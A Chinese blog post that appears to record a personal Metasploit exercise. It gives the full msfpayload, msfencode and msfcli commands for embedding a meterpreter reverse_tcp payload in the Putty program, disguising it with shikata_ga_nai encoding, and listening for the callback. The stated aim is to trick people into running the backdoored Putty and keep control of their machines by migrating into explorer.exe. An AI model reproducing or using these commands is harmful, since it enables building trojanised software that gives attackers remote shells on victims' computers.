meterpreter的攻击载荷使用

meterpreter号称是metasploit里面最牛逼的模块,今天我就使用了一下,下面记录一下过程。我这次试验的主要目的是,把能用的攻击载荷绑定到Putty程序上,当受攻击者打开Putty程序之后,我再通过命令将木马线程迁移到一个不会关闭的进程上,如explorer.exe.然后我就能保证木马进程持续不衰地为我服务了,至于怎么诱导人打开,还有怎么使用这个进程,这是后话,还需要进行后面命令的处理。我先记录目前完成的步骤。

  1. 首先,载入此次所需要用到的攻击载荷:

    root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp O

在这里,要说明的是,我已经把putty.exe的文件拷入到/root/example_01下了(我这里改名为putty_02.exe,其实都一样)。而且操作也是在此文件夹下执行。


2.下一步就是要将攻击载荷植入这个putty_02.exe文件当中,这样它才能产生作用,在执行命令的同时,需要进行相关设置,以便于在执行之后,能向LHOST机器回传信息:

root@bt:~/example_01# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 R | msfencode -t exe -x /root/example_01/putty_02.exe -k -o putty_backdoor.exe -e x86/shikata_ga_nai -c 5

使用以上命令,设置攻击机为我的主机:192.168.17.135,使用端口为80,然后将植入后的文件生成为putty_backdoor.exe。

可见,执行成功,攻击载荷成功植入putty_backdoor.exe

将这个putty程序拷贝出虚拟机,然后具体怎么让别人使用,那就是后话了。


3.使用msfcli模式打开那个载荷的坚挺进程,等待有人上钩:

root@bt:/pentest/exploits/framework3# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.17.135 LPORT=80 E

此时,如果在某台肉鸡上面有人点击了你的putty程序,就会有如下状况:


4.至此,彻底进入meterpreter状态。可以利用后面的方法进行控制了。例如,输入shell.获取肉鸡控制。


展开阅读全文

没有更多推荐了,返回首页